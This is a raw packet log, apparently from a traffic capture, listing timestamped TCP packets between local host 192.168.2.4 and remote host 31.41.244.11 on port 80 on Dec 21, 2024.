                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.388750076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.388801098 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.388880014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.388927937 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.389772892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.389816999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.389906883 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.389960051 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.390738010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.390789986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.390899897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.390953064 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.391746044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.391797066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.391896963 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.391947031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.392765999 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.392819881 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.392899036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.392951965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.393759966 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.393819094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.393897057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.393946886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.394753933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.394798994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.394891024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.394947052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.395756960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.395806074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.395888090 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.395936012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.396739006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.396790028 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.396893978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.396943092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.397828102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.397880077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.397969961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.398020983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.398791075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.398844004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.398921967 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.398971081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539288044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539341927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539484024 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539530993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539743900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539793968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539860010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.539905071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.540738106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.540783882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.540872097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.540919065 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.541743994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.541785955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.541867018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.541908979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.542788029 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.542834997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.542895079 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.542937994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.543754101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.543809891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.543864012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.543909073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.544789076 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.544842958 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.544904947 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.544941902 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.545737982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.545779943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.545965910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.546113014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.546767950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.546809912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.546889067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.546933889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.547851086 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.547892094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.547997952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.548039913 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.548755884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.548851013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.548894882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.548953056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.549762964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.549808979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.549885035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.549930096 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.550744057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.550793886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.550904036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.550949097 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.551781893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.551824093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.551901102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.551947117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.552742004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.552788019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.552865982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.552907944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.553735971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.553781986 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.553895950 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.553937912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.554783106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.554825068 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.554903984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.554949045 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.555762053 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.555810928 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.555882931 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.555927992 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.556761980 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.556803942 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.556883097 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.556926012 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.557792902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.557837009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.557920933 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.557960033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.558775902 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.558856964 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.558868885 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.558893919 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.559765100 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.559808016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.559870958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.559921026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.560761929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.560808897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.560914993 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.560965061 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.561762094 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.561814070 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.561878920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.561923981 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.562787056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.562844038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.562923908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.562969923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564085960 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564137936 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564146042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564181089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564793110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564850092 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564932108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.564977884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.565776110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.565821886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.565901995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.565948009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.566765070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.566809893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.566874981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.566917896 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.567769051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.567817926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.567900896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.567948103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.568761110 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.568811893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.568928003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.568980932 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.569767952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.569819927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.569885969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.569933891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.570765018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.570815086 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.570935965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.570981979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.571826935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.571876049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.571938992 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.571988106 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.572817087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.572866917 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.572931051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.572979927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.573792934 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.573842049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.573901892 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.573949099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.574811935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.574861050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.574940920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.574989080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.575783014 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.575831890 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.575895071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.575936079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.576893091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.576941967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577250957 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577300072 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577807903 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577855110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577919006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.577972889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.578774929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.578824997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.578950882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.578996897 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.579802036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.579852104 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.579916954 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.579972029 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.580776930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.580826998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.580890894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.580939054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.581860065 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.581908941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.581948042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.581995010 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.582802057 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.582853079 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583360910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583409071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583791971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583839893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583878994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.583921909 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.584789991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.584840059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.584918976 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.584966898 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.585767984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.585817099 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.585894108 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.585941076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.586770058 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.586812973 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.586920023 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.586965084 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.587817907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.587867022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.587930918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.587975979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.588802099 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.588850975 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.588960886 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.589013100 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.589860916 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.589911938 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.589960098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.590003967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.590815067 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.590863943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.590941906 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.590985060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.591775894 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.591823101 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732161045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732297897 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732413054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732413054 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732445002 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732497931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732727051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.732773066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.733664989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.733716011 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.733798981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.733849049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.734659910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:11.734709024 CET4977080192.168.2.431.41.244.11
